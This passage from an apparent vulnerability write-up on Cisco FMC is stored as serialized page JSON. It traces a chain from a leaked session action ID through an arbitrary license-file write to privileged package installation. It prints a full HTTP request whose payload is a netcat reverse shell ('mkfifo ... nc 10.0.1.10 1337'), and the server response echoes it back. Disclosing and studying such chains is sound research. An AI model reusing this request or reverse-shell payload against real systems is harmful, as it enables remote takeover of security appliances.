",[1277,4742,3127],{},". The session now has more session values set, including the necessary ",[1277,4745,1306],{},[1449,4747,4749],{"className":2232,"code":4748,"language":2234,"meta":148,"style":148},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions WHERE id='csm_processes';\n| $D = {'useruuid' => '616931da-e3df-11dc-8002-930b8c1d4d5e','user_access_type' => 0,'_SESSION_ID' => 'csm_processes','last_csm_refresh' => 1773962941,'current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','VMS_SESSION_ID' => 'csm_processes','_SESSION_ATIME' => 1773962943,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','username' => 'report','_SESSION_CTIME' => 1773962523,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'_SESSION_REMOTE_ADDR' => '','usertype' => 1,'_SESSION_ETIME' => 3900,'session_expire_check' => 1,'last_login' => {'remote_host_ip' => '10.0.1.10','last_login_time' => 1773951618},'sf_action_id' => 'fe8b71b0344419ae464328a578a12902','active' => 0};;$D |\n",[1277,4750,4751,4785],{"__ignoreMap":148},[1471,4752,4753,4755,4757,4759,4761,4763,4765,4767,4769,4772,4775,4777,4779,4781,4783],{"class":1473,"line":1474},[1471,4754,2241],{"class":1487},[1471,4756,2244],{"class":1516},[1471,4758,2248],{"class":2247},[1471,4760,2251],{"class":1487},[1471,4762,2254],{"class":2247},[1471,4764,2258],{"class":2257},[1471,4766,1201],{"class":1487},[1471,4768,2263],{"class":2257},[1471,4770,4771],{"class":2247}," WHERE",[1471,4773,4774],{"class":1487}," id",[1471,4776,2278],{"class":1516},[1471,4778,1524],{"class":1523},[1471,4780,1279],{"class":1527},[1471,4782,1524],{"class":1523},[1471,4784,1770],{"class":1487},[1471,4786,4787,4789,4791,4793,4795,4797,4799,4801,4803,4806,4808,4810,4812,4814,4816,4818,4820,4822,4824,4826,4828,4830,4832,4834,4836,4838,4840,4842,4844,4846,4849,4851,4853,4855,4857,4859,4861,4863,4865,4867,4869,4871,4873,4875,4877,4879,4881,4883,4885,4887,4889,4891,4894,4896,4898,4900,4902,4904,4906,4908,4910,4912,4914,4916,4918,4920,4922,4924,4926,4928,4930,4932,4934,4936,4938,4940,4942,4944,4946,4948,4950,4952,4954,4956,4958,4960,4962,4964,4966,4968,4970,4972,4974,4976,4978,4980,4982,4984,4986,4988,4990,4992,4994,4996,4998,5000,5002,5004,5006,5008,5010,5012,5014,5016,5018,5020,5022,5024,5026,5028,5030,5032,5034,5036,5038,5040,5042,5044,5047,5049,5051,5053,5055,5057,5059,5062,5064,5066,5068,5070,5072,5074,5076],{"class":1473,"line":149},[1471,4788,2275],{"class":1487},[1471,4790,2278],{"class":1516},[1471,4792,2281],{"class":1487},[1471,4794,1524],{"class":1523},[1471,4796,2336],{"class":1527},[1471,4798,1524],{"class":1523},[1471,4800,1844],{"class":1516},[1471,4802,1569],{"class":1523},[1471,4804,4805],{"class":1527},"616931da-e3df-11dc-8002-930b8c1d4d5e",[1471,4807,1524],{"class":1523},[1471,4809,2298],{"class":1487},[1471,4811,1524],{"class":1523},[1471,4813,2684],{"class":1527},[1471,4815,1524],{"class":1523},[1471,4817,1844],{"class":1516},[1471,4819,2418],{"class":2328},[1471,4821,2298],{"class":1487},[1471,4823,1524],{"class":1523},[1471,4825,2394],{"class":1527},[1471,4827,1524],{"class":1523},[1471,4829,1844],{"class":1516},[1471,4831,1569],{"class":1523},[1471,4833,1279],{"class":1527},[1471,4835,1524],{"class":1523},[1471,4837,2298],{"class":1487},[1471,4839,1524],{"class":1523},[1471,4841,2572],{"class":1527},[1471,4843,1524],{"class":1523},[1471,4845,1844],{"class":1516},[1471,4847,4848],{"class":2328}," 1773962941",[1471,4850,2298],{"class":1487},[1471,4852,1524],{"class":1523},[1471,4854,2468],{"class":1527},[1471,4856,1524],{"class":1523},[1471,4858,1844],{"class":1516},[1471,4860,1569],{"class":1523},[1471,4862,2312],{"class":1527},[1471,4864,1524],{"class":1523},[1471,4866,2298],{"class":1487},[1471,4868,1524],{"class":1523},[1471,4870,2451],{"class":1527},[1471,4872,1524],{"class":1523},[1471,4874,1844],{"class":1516},[1471,4876,1569],{"class":1523},[1471,4878,1279],{"class":1527},[1471,4880,1524],{"class":1523},[1471,4882,2298],{"class":1487},[1471,4884,1524],{"class":1523},[1471,4886,2381],{"class":1527},[1471,4888,1524],{"class":1523},[1471,4890,1844],{"class":1516},[1471,4892,4893],{"class":2328}," 1773962943",[1471,4895,2298],{"class":1487},[1471,4897,1524],{"class":1523},[1471,4899,2303],{"class":1527},[1471,4901,1524],{"class":1523},[1471,4903,1844],{"class":1516},[1471,4905,1569],{"class":1523},[1471,4907,2312],{"class":1527},[1471,4909,1524],{"class":1523},[1471,4911,2298],{"class":1487},[1471,4913,1524],{"class":1523},[1471,4915,1726],{"class":1527},[1471,4917,1524],{"class":1523},[1471,4919,1844],{"class":1516},[1471,4921,1569],{"class":1523},[1471,4923,1920],{"class":1527},[1471,4925,1524],{"class":1523},[1471,4927,2298],{"class":1487},[1471,4929,1524],{"class":1523},[1471,4931,2367],{"class":1527},[1471,4933,1524],{"class":1523},[1471,4935,1844],{"class":1516},[1471,4937,2374],{"class":2328},[1471,4939,2298],{"class":1487},[1471,4941,1524],{"class":1523},[1471,4943,2439],{"class":1527},[1471,4945,1524],{"class":1523},[1471,4947,1844],{"class":1516},[1471,4949,2281],{"class":1487},[1471,4951,1524],{"class":1523},[1471,4953,2321],{"class":1527},[1471,4955,1524],{"class":1523},[1471,4957,1844],{"class":1516},[1471,4959,2647],{"class":2328},[1471,4961,2650],{"class":1487},[1471,4963,1524],{"class":1523},[1471,4965,2425],{"class":1527},[1471,4967,1524],{"class":1523},[1471,4969,1844],{"class":1516},[1471,4971,2432],{"class":1523},[1471,4973,2298],{"class":1487},[1471,4975,1524],{"class":1523},[1471,4977,1528],{"class":1527},[1471,4979,1524],{"class":1523},[1471,4981,1844],{"class":1516},[1471,4983,2329],{"class":2328},[1471,4985,2298],{"class":1487},[1471,4987,1524],{"class":1523},[1471,4989,2889],{"class":1527},[1471,4991,1524],{"class":1523},[1471,4993,1844],{"class":1516},[1471,4995,2896],{"class":2328},[1471,4997,2298],{"class":1487},[1471,4999,1524],{"class":1523},[1471,5001,2321],{"class":1527},[1471,5003,1524],{"class":1523},[1471,5005,1844],{"class":1516},[1471,5007,2329],{"class":2328},[1471,5009,2298],{"class":1487},[1471,5011,1524],{"class":1523},[1471,5013,2702],{"class":1527},[1471,5015,1524],{"class":1523},[1471,5017,1844],{"class":1516},[1471,5019,2281],{"class":1487},[1471,5021,1524],{"class":1523},[1471,5023,2727],{"class":1527},[1471,5025,1524],{"class":1523},[1471,5027,1844],{"class":1516},[1471,5029,1569],{"class":1523},[1471,5031,2736],{"class":1527},[1471,5033,1524],{"class":1523},[1471,5035,2298],{"class":1487},[1471,5037,1524],{"class":1523},[1471,5039,2713],{"class":1527},[1471,5041,1524],{"class":1523},[1471,5043,1844],{"class":1516},[1471,5045,5046],{"class":2328}," 1773951618",[1471,5048,2650],{"class":1487},[1471,5050,1524],{"class":1523},[1471,5052,1306],{"class":1527},[1471,5054,1524],{"class":1523},[1471,5056,1844],{"class":1516},[1471,5058,1569],{"class":1523},[1471,5060,5061],{"class":1527},"fe8b71b0344419ae464328a578a12902",[1471,5063,1524],{"class":1523},[1471,5065,2298],{"class":1487},[1471,5067,1524],{"class":1523},[1471,5069,2411],{"class":1527},[1471,5071,1524],{"class":1523},[1471,5073,1844],{"class":1516},[1471,5075,2418],{"class":2328},[1471,5077,2481],{"class":1487},[184,5079,5080,5081,5084,5085,5088],{},"Another redirect to ",[1277,5082,5083],{},"\u002Fui\u002Fuser\u002Fgeneral"," can be followed, and then the FMC \"DDD\" logic renders a UI template containing a call to the template ",[1277,5086,5087],{},"SF::Auth::getSFActionID()"," that renders that session value on the page:",[1449,5090,5094],{"className":5091,"code":5092,"language":5093,"meta":148,"style":148},"language-html shiki shiki-themes material-theme-lighter github-light github-dark monokai","...snip...\n \u003C!-- Global variables and functions -->\n \u003Cscript type=\"text\u002Fjavascript\">\n var sf_action_id = \"fe8b71b0344419ae464328a578a12902\";\n var __prefetch = {\"capabilities\":{\"hideMenuForOnbox\":0,\"isLamplighterEnabled\":0,\"isOnboxManaged\":0,\"showDeployDialog\":0,\"isStandbyDC\":\"0\",\"isExternalStorageEnabled\":0,\"isWorkflowEnabled\":1,\"isSyslogAllLogsToFmc\":1,\"activityId\":0,\"isCDODeployment\":0,\"isNATExemptEnabled\":1,\"isUM\":1,\"isChangeMgmtWorkflowEnabled\":0,\"exposeDNSReputationEnforcement\":1},\"static\":{\"locale\":\"en_US\",\"SF::MultiTenancy::isDomainObjInfoVisible\":{\"isDomainInfoVisible\":0}}};\n \u002F\u002F Backdraft integration\n var BackdraftSyncIntegration = (function() {\n var currentHelpTopic = undefined;\n var navMap = {};\n...snip...\n","html",[1277,5095,5096,5100,5105,5128,5146,5404,5409,5428,5444,5456],{"__ignoreMap":148},[1471,5097,5098],{"class":1473,"line":1474},[1471,5099,3647],{"class":1487},[1471,5101,5102],{"class":1473,"line":149},[1471,5103,5104],{"class":1477}," \u003C!-- Global variables and functions -->\n",[1471,5106,5107,5110,5113,5117,5119,5121,5124,5126],{"class":1473,"line":1498},[1471,5108,5109],{"class":1491}," \u003C",[1471,5111,5112],{"class":3163},"script",[1471,5114,5116],{"class":5115},"s_lYk"," type",[1471,5118,2278],{"class":1491},[1471,5120,1767],{"class":1523},[1471,5122,5123],{"class":1527},"text\u002Fjavascript",[1471,5125,1767],{"class":1523},[1471,5127,3628],{"class":1491},[1471,5129,5130,5133,5136,5138,5140,5142,5144],{"class":1473,"line":1536},[1471,5131,5132],{"class":4157}," var",[1471,5134,5135],{"class":1487}," sf_action_id ",[1471,5137,2278],{"class":1516},[1471,5139,1739],{"class":1523},[1471,5141,5061],{"class":1527},[1471,5143,1767],{"class":1523},[1471,5145,1770],{"class":1491},[1471,5147,5148,5150,5153,5155,5157,5159,5163,5165,5168,5170,5173,5175,5177,5179,5181,5183,5186,5188,5190,5192,5194,5196,5199,5201,5203,5205,5207,5209,5212,5214,5216,5218,5220,5222,5225,5227,5229,5231,5233,5235,5237,5239,5242,5244,5246,5248,5250,5252,5255,5257,5259,5261,5263,5265,5268,5270,5272,5274,5276,5278,5281,5283,5285,5287,5289,5291,5294,5296,5298,5300,5302,5304,5307,5309,5311,5313,5315,5317,5320,5322,5324,5326,5328,5330,5333,5335,5337,5339,5341,5343,5346,5348,5350,5352,5354,5356,5359,5361,5363,5365,5368,5370,5372,5374,5377,5379,5381,5383,5386,5388,5390,5392,5395,5397,5399,5401],{"class":1473,"line":1546},[1471,5149,5132],{"class":4157},[1471,5151,5152],{"class":1487}," __prefetch ",[1471,5154,2278],{"class":1516},[1471,5156,2281],{"class":1491},[1471,5158,1767],{"class":1523},[1471,5160,5162],{"class":5161},"sJhdN","capabilities",[1471,5164,1767],{"class":1523},[1471,5166,5167],{"class":1491},":{",[1471,5169,1767],{"class":1523},[1471,5171,5172],{"class":5161},"hideMenuForOnbox",[1471,5174,1767],{"class":1523},[1471,5176,1447],{"class":1491},[1471,5178,2502],{"class":2328},[1471,5180,2298],{"class":1491},[1471,5182,1767],{"class":1523},[1471,5184,5185],{"class":5161},"isLamplighterEnabled",[1471,5187,1767],{"class":1523},[1471,5189,1447],{"class":1491},[1471,5191,2502],{"class":2328},[1471,5193,2298],{"class":1491},[1471,5195,1767],{"class":1523},[1471,5197,5198],{"class":5161},"isOnboxManaged",[1471,5200,1767],{"class":1523},[1471,5202,1447],{"class":1491},[1471,5204,2502],{"class":2328},[1471,5206,2298],{"class":1491},[1471,5208,1767],{"class":1523},[1471,5210,5211],{"class":5161},"showDeployDialog",[1471,5213,1767],{"class":1523},[1471,5215,1447],{"class":1491},[1471,5217,2502],{"class":2328},[1471,5219,2298],{"class":1491},[1471,5221,1767],{"class":1523},[1471,5223,5224],{"class":5161},"isStandbyDC",[1471,5226,1767],{"class":1523},[1471,5228,1447],{"class":1491},[1471,5230,1767],{"class":1523},[1471,5232,2502],{"class":1527},[1471,5234,1767],{"class":1523},[1471,5236,2298],{"class":1491},[1471,5238,1767],{"class":1523},[1471,5240,5241],{"class":5161},"isExternalStorageEnabled",[1471,5243,1767],{"class":1523},[1471,5245,1447],{"class":1491},[1471,5247,2502],{"class":2328},[1471,5249,2298],{"class":1491},[1471,5251,1767],{"class":1523},[1471,5253,5254],{"class":5161},"isWorkflowEnabled",[1471,5256,1767],{"class":1523},[1471,5258,1447],{"class":1491},[1471,5260,454],{"class":2328},[1471,5262,2298],{"class":1491},[1471,5264,1767],{"class":1523},[1471,5266,5267],{"class":5161},"isSyslogAllLogsToFmc",[1471,5269,1767],{"class":1523},[1471,5271,1447],{"class":1491},[1471,5273,454],{"class":2328},[1471,5275,2298],{"class":1491},[1471,5277,1767],{"class":1523},[1471,5279,5280],{"class":5161},"activityId",[1471,5282,1767],{"class":1523},[1471,5284,1447],{"class":1491},[1471,5286,2502],{"class":2328},[1471,5288,2298],{"class":1491},[1471,5290,1767],{"class":1523},[1471,5292,5293],{"class":5161},"isCDODeployment",[1471,5295,1767],{"class":1523},[1471,5297,1447],{"class":1491},[1471,5299,2502],{"class":2328},[1471,5301,2298],{"class":1491},[1471,5303,1767],{"class":1523},[1471,5305,5306],{"class":5161},"isNATExemptEnabled",[1471,5308,1767],{"class":1523},[1471,5310,1447],{"class":1491},[1471,5312,454],{"class":2328},[1471,5314,2298],{"class":1491},[1471,5316,1767],{"class":1523},[1471,5318,5319],{"class":5161},"isUM",[1471,5321,1767],{"class":1523},[1471,5323,1447],{"class":1491},[1471,5325,454],{"class":2328},[1471,5327,2298],{"class":1491},[1471,5329,1767],{"class":1523},[1471,5331,5332],{"class":5161},"isChangeMgmtWorkflowEnabled",[1471,5334,1767],{"class":1523},[1471,5336,1447],{"class":1491},[1471,5338,2502],{"class":2328},[1471,5340,2298],{"class":1491},[1471,5342,1767],{"class":1523},[1471,5344,5345],{"class":5161},"exposeDNSReputationEnforcement",[1471,5347,1767],{"class":1523},[1471,5349,1447],{"class":1491},[1471,5351,454],{"class":2328},[1471,5353,2650],{"class":1491},[1471,5355,1767],{"class":1523},[1471,5357,5358],{"class":5161},"static",[1471,5360,1767],{"class":1523},[1471,5362,5167],{"class":1491},[1471,5364,1767],{"class":1523},[1471,5366,5367],{"class":5161},"locale",[1471,5369,1767],{"class":1523},[1471,5371,1447],{"class":1491},[1471,5373,1767],{"class":1523},[1471,5375,5376],{"class":1527},"en_US",[1471,5378,1767],{"class":1523},[1471,5380,2298],{"class":1491},[1471,5382,1767],{"class":1523},[1471,5384,5385],{"class":5161},"SF::MultiTenancy::isDomainObjInfoVisible",[1471,5387,1767],{"class":1523},[1471,5389,5167],{"class":1491},[1471,5391,1767],{"class":1523},[1471,5393,5394],{"class":5161},"isDomainInfoVisible",[1471,5396,1767],{"class":1523},[1471,5398,1447],{"class":1491},[1471,5400,2502],{"class":2328},[1471,5402,5403],{"class":1491},"}}};\n",[1471,5405,5406],{"class":1473,"line":1580},[1471,5407,5408],{"class":1477}," \u002F\u002F Backdraft integration\n",[1471,5410,5411,5414,5417,5419,5421,5424,5426],{"class":1473,"line":1612},[1471,5412,5413],{"class":4157}," var",[1471,5415,5416],{"class":1487}," BackdraftSyncIntegration ",[1471,5418,2278],{"class":1516},[1471,5420,1488],{"class":1487},[1471,5422,5423],{"class":4157},"function",[1471,5425,4378],{"class":1491},[1471,5427,1621],{"class":1491},[1471,5429,5430,5433,5436,5439,5442],{"class":1473,"line":1624},[1471,5431,5432],{"class":4157}," var",[1471,5434,5435],{"class":1487}," currentHelpTopic",[1471,5437,5438],{"class":1516}," =",[1471,5440,5441],{"class":3917}," undefined",[1471,5443,1770],{"class":1491},[1471,5445,5446,5448,5451,5453],{"class":1473,"line":1648},[1471,5447,5432],{"class":4157},[1471,5449,5450],{"class":1487}," navMap",[1471,5452,5438],{"class":1516},[1471,5454,5455],{"class":1491}," {};\n",[1471,5457,5458,5461,5464],{"class":1473,"line":1654},[1471,5459,5460],{"class":1516},"...",[1471,5462,5463],{"class":1487},"snip",[1471,5465,5466],{"class":1516},"...\n",[184,5468,5469,5470,5472,5473,5475,5476,5478,5479,1201],{},"Now that a ",[1277,5471,1306],{}," is accessible, we can make calls to the previous ",[1277,5474,1329],{}," and ",[1277,5477,3784],{}," endpoints with the retrieved ",[1277,5480,1306],{},[246,5482,5484],{"id":5483},"a-variety-of-scripts-and-commands","A Variety of Scripts and Commands",[184,5486,5487],{},"Now that we can finally reach the CGI scripts and call them, the team crawled through these functions looking for primitives to use. We identified three useful calls:",[2493,5489,5490,5507,5543],{},[230,5491,5492,5493,5495,5496,5499,5500,5502,5503,5506],{},"An arbitrary write via ",[1277,5494,3784],{}," using the ",[1277,5497,5498],{},"validateLicense"," call that will take arbitrary data and write it to ",[1277,5501,1322],{},". Binary data can be written to that by providing JSON Unicode-escaped values, such as ",[1277,5504,5505],{},"\\u000a"," for newlines.",[230,5508,5509,5510,5495,5512,5515,5516,5519,5520,5523,5524,5526,5527,5530,5531,5534,5535,5538,5539,5542],{},"An arbitrary Perl Storable deserialization via ",[1277,5511,3784],{},[1277,5513,5514],{},"batchResult"," function call that allows a path traversal to ",[1277,5517,5518],{},"..\u002Flicense.tmp",", and then will call ",[1277,5521,5522],{},"\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," and the ",[1277,5525,5514],{}," function that contains another call to ",[1277,5528,5529],{},"SF::Util::DeSerialize"," that finally calls ",[1277,5532,5533],{},"Storable::retrieve"," (with the unsafe ",[1277,5536,5537],{},"local $Storable::Eval = $Storable::Eval = 1;"," setting). It's likely that this is exploitable to directly achieve RCE, but no usable ",[1277,5540,5541],{},"STORABLE_thaw"," gadgets were found during testing.",[230,5544,5545,5546,5548,5549,5551,5552,5555],{},"An upgrade package installer function call to ",[1277,5547,1333],{}," via the ",[1277,5550,1329],{}," code and a set of options pointing to the ",[1277,5553,5554],{},"license.tmp"," file that validates a large set of parameters and options, but can be used to run \"installable\" package types provided by Cisco.",[184,5557,5558,5559,5562,5563,5566],{},"The update types can be checked in ",[1277,5560,5561],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUpdate.pm"," with the ",[1277,5564,5565],{},"GetUpdateFileType"," that checks the first 1024 bytes and assigns a type to the \"install\" file:",[227,5568,5569,5575,5581,5587,5593,5603,5612,5621,5627],{},[230,5570,5571,5574],{},[1277,5572,5573],{},"EMPTY"," - empty",[230,5576,5577,5580],{},[1277,5578,5579],{},"GPG"," - GPG-signed install package",[230,5582,5583,5586],{},[1277,5584,5585],{},"RPM"," - and RPM package",[230,5588,5589,5592],{},[1277,5590,5591],{},"TARBALL_XZ"," - an XZ-compressed tarball file",[230,5594,5595,5598,5599,5602],{},[1277,5596,5597],{},"BUNDLE"," - a custom Cisco install format that contains a ",[1277,5600,5601],{},"bundle.tar"," file",[230,5604,5605,5608,5609],{},[1277,5606,5607],{},"SCRIPT"," - A shell script that contains ",[1277,5610,5611],{},"#!\u002Fbin\u002Fsh",[230,5613,5614,5617,5618],{},[1277,5615,5616],{},"MAKESELF"," - A shell script that also contains the hardcoded string ",[1277,5619,5620],{},"# This script was generated using Makeself",[230,5622,5623,5626],{},[1277,5624,5625],{},"STUB"," - a split stub JSON file",[230,5628,5629,5632],{},[1277,5630,5631],{},"UNKNOWN"," - Anything else",[184,5634,1292,5635,5638,5639,5642,5643,5645,5646,5648,5649,5651,5652,5655,5656,5659,5660,5663,5664,5667,5668,5671,5672,5675,5676,5679,5680,5682,5683,5686,5687,5690,5691,5694],{},[1277,5636,5637],{},"upgradeReadinessCall"," will only reach the ",[1277,5640,5641],{},"Install"," logic under a subset of these types, and the trivial ",[1277,5644,5607],{}," will not work for basic execution. Luckily, ",[1277,5647,5616],{}," is also just a shell script with a slightly different format and a hardcoded string. The ",[1277,5650,5637],{}," will validate a few UUID parameters and the filetype before passing it to ",[1277,5653,5654],{},"SF::Update::readinessInstall"," that calls ",[1277,5657,5658],{},"SF::Update::GetUpdateFileInfo",", runs a ",[1374,5661,5662],{},"large"," set of checks, and then triggers ",[1277,5665,5666],{},"SF::Update::Install"," on the file. That in turn calls ",[1277,5669,5670],{},"SF::Update::Install::_aqInstallTask"," that does disk space checks, validates signatures, performs a few more checks, and then queues the task into ",[1277,5673,5674],{},"SF::System::Privileged::InstallUpdate"," with the filename. This package ",[1374,5677,5678],{},"finally"," calls ",[1277,5681,1343],{},", which ironically checks whether the caller was run from ",[1277,5684,5685],{},"SF::System"," — and if so, it marks the first command argument to be ",[1277,5688,5689],{},"\u002Fusr\u002Fbin\u002Fsudo"," and runs the following ",[1277,5692,5693],{},"eval"," indicating code execution can be achieved:",[1449,5696,5698],{"className":1465,"code":5697,"language":1467,"meta":148,"style":148},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n# chance of someone inputting commands\nopen(SFNULL, \"\u002Fdev\u002Fnull\");\n\nwarn Dumper($dumpcmd) if $DEBUG;\n\n# Traps exceptions for the open call.\neval\n{\n $pid = open3(*SFNULL, *OUTH, *ERRH, @$cmd);\n};\n\n",[1277,5699,5700,5705,5710,5727,5731,5751,5755,5760,5765,5770,5782],{"__ignoreMap":148},[1471,5701,5702],{"class":1473,"line":1474},[1471,5703,5704],{"class":1477},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n",[1471,5706,5707],{"class":1473,"line":149},[1471,5708,5709],{"class":1477},"# chance of someone inputting commands\n",[1471,5711,5712,5715,5718,5720,5723,5725],{"class":1473,"line":1498},[1471,5713,5714],{"class":1554},"open",[1471,5716,5717],{"class":1487},"(SFNULL, ",[1471,5719,1767],{"class":1523},[1471,5721,5722],{"class":1527},"\u002Fdev\u002Fnull",[1471,5724,1767],{"class":1523},[1471,5726,1533],{"class":1487},[1471,5728,5729],{"class":1473,"line":1536},[1471,5730,3383],{"emptyLinePlaceholder":54},[1471,5732,5733,5736,5739,5741,5744,5746,5748],{"class":1473,"line":1546},[1471,5734,5735],{"class":1554},"warn",[1471,5737,5738],{"class":1487}," Dumper(",[1471,5740,1492],{"class":1491},[1471,5742,5743],{"class":1487},"dumpcmd) ",[1471,5745,1484],{"class":1483},[1471,5747,1505],{"class":1491},[1471,5749,5750],{"class":1487},"DEBUG;\n",[1471,5752,5753],{"class":1473,"line":1580},[1471,5754,3383],{"emptyLinePlaceholder":54},[1471,5756,5757],{"class":1473,"line":1612},[1471,5758,5759],{"class":1477},"# Traps exceptions for the open call.\n",[1471,5761,5762],{"class":1473,"line":1624},[1471,5763,5764],{"class":1483},"eval\n",[1471,5766,5767],{"class":1473,"line":1648},[1471,5768,5769],{"class":1487},"{\n",[1471,5771,5772,5774,5777,5779],{"class":1473,"line":1654},[1471,5773,4226],{"class":1491},[1471,5775,5776],{"class":1487},"pid = open3(*SFNULL, *OUTH, *ERRH, ",[1471,5778,4182],{"class":1491},[1471,5780,5781],{"class":1487},"$cmd);\n",[1471,5783,5784],{"class":1473,"line":1662},[1471,5785,5786],{"class":1487},"};\n",[184,5788,5789],{},"The full process of this path execution from the file write is as follows:",[184,5791,5792,5793,5795,5796,5799,5800,5802,5803,5805,5806,5809],{},"The file write to ",[1277,5794,3784],{}," is called with the ",[1277,5797,5798],{},"callServerFunc"," URL parameter and an arbitrary Unix timestamp; then the body content is the JSON array containing an ordered array of parameters. In our case, we call the ",[1277,5801,5498],{}," function and place our payload in a ",[1277,5804,5616],{}," validating script that uses the JSON Unicode-escaped format for any newline characters (normal ",[1277,5807,5808],{},"\\n"," will not validate, and arbitrary binary data can actually be written to the file with this technique):",[1449,5811,5813],{"className":3138,"code":5812,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 216\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nOrigin: https:\u002F\u002F10.0.0.226\nReferer: https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\nConnection: keep-alive\n\n\n[\n\"2c33d78906e48adf429099629b0e1acf\",\n\"validateLicense\",\n\"#!\u002Fbin\u002Fsh\\u000A# This script was generated using Makeself\\u000A\\u000Arm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\u000A\"]\n",[1277,5814,5815,5828,5836,5844,5853,5861,5869,5877,5885,5895,5903,5907,5911,5916,5928,5938],{"__ignoreMap":148},[1471,5816,5817,5819,5822,5824,5826],{"class":1473,"line":1474},[1471,5818,3809],{"class":1483},[1471,5820,5821],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 ",[1471,5823,3153],{"class":2247},[1471,5825,55],{"class":1487},[1471,5827,3158],{"class":2328},[1471,5829,5830,5832,5834],{"class":1473,"line":149},[1471,5831,3164],{"class":3163},[1471,5833,1447],{"class":2247},[1471,5835,3169],{"class":1527},[1471,5837,5838,5840,5842],{"class":1473,"line":1498},[1471,5839,3428],{"class":3163},[1471,5841,1447],{"class":2247},[1471,5843,3433],{"class":1527},[1471,5845,5846,5848,5850],{"class":1473,"line":1536},[1471,5847,3274],{"class":3163},[1471,5849,1447],{"class":2247},[1471,5851,5852],{"class":1527}," 216\n",[1471,5854,5855,5857,5859],{"class":1473,"line":1546},[1471,5856,3254],{"class":3163},[1471,5858,1447],{"class":2247},[1471,5860,3863],{"class":1527},[1471,5862,5863,5865,5867],{"class":1473,"line":1580},[1471,5864,3174],{"class":3163},[1471,5866,1447],{"class":2247},[1471,5868,3179],{"class":1527},[1471,5870,5871,5873,5875],{"class":1473,"line":1612},[1471,5872,3876],{"class":3163},[1471,5874,1447],{"class":2247},[1471,5876,3881],{"class":1527},[1471,5878,5879,5881,5883],{"class":1473,"line":1624},[1471,5880,4683],{"class":3163},[1471,5882,1447],{"class":2247},[1471,5884,4688],{"class":1527},[1471,5886,5887,5890,5892],{"class":1473,"line":1648},[1471,5888,5889],{"class":3163},"Referer",[1471,5891,1447],{"class":2247},[1471,5893,5894],{"class":1527}," https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\n",[1471,5896,5897,5899,5901],{"class":1473,"line":1654},[1471,5898,3194],{"class":3163},[1471,5900,1447],{"class":2247},[1471,5902,3199],{"class":1527},[1471,5904,5905],{"class":1473,"line":1662},[1471,5906,3383],{"emptyLinePlaceholder":54},[1471,5908,5909],{"class":1473,"line":1673},[1471,5910,3383],{"emptyLinePlaceholder":54},[1471,5912,5913],{"class":1473,"line":1681},[1471,5914,5915],{"class":1491},"[\n",[1471,5917,5918,5920,5923,5925],{"class":1473,"line":1691},[1471,5919,1767],{"class":1523},[1471,5921,5922],{"class":1527},"2c33d78906e48adf429099629b0e1acf",[1471,5924,1767],{"class":1523},[1471,5926,5927],{"class":1491},",\n",[1471,5929,5930,5932,5934,5936],{"class":1473,"line":1699},[1471,5931,1767],{"class":1523},[1471,5933,5498],{"class":1527},[1471,5935,1767],{"class":1523},[1471,5937,5927],{"class":1491},[1471,5939,5940,5942,5944,5947,5949,5952,5955,5957,5959],{"class":1473,"line":1705},[1471,5941,1767],{"class":1523},[1471,5943,5611],{"class":1527},[1471,5945,5946],{"class":2257},"\\u000A",[1471,5948,5620],{"class":1527},[1471,5950,5951],{"class":2257},"\\u000A\\u000A",[1471,5953,5954],{"class":1527},"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff",[1471,5956,5946],{"class":2257},[1471,5958,1767],{"class":1523},[1471,5960,3966],{"class":1491},[184,5962,5963],{},"The server will respond with an error saying that the license is invalid:",[1449,5965,5967],{"className":3138,"code":5966,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 200 OK\nServer: Mojolicious (Perl)\nContent-Type: application\u002Fjson\nContent-Length: 219\n\n{\"data\":{\"lic\":\"#!\u002Fbin\u002Fsh\\n# This script was generated using Makeself\\n\\nrm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\n\",\"statusmsg\":\"License is Invalid.\\n\",\"status\":0,\"isBaseLicense\":0}}\n",[1277,5968,5969,5981,5989,5997,6006,6010],{"__ignoreMap":148},[1471,5970,5971,5973,5975,5977,5979],{"class":1473,"line":1474},[1471,5972,3153],{"class":2247},[1471,5974,55],{"class":1487},[1471,5976,3213],{"class":2328},[1471,5978,3473],{"class":2328},[1471,5980,3476],{"class":1527},[1471,5982,5983,5985,5987],{"class":1473,"line":149},[1471,5984,3234],{"class":3163},[1471,5986,1447],{"class":2247},[1471,5988,3239],{"class":1527},[1471,5990,5991,5993,5995],{"class":1473,"line":1498},[1471,5992,3254],{"class":3163},[1471,5994,1447],{"class":2247},[1471,5996,3863],{"class":1527},[1471,5998,5999,6001,6003],{"class":1473,"line":1536},[1471,6000,3274],{"class":3163},[1471,6002,1447],{"class":2247},[1471,6004,6005],{"class":1527}," 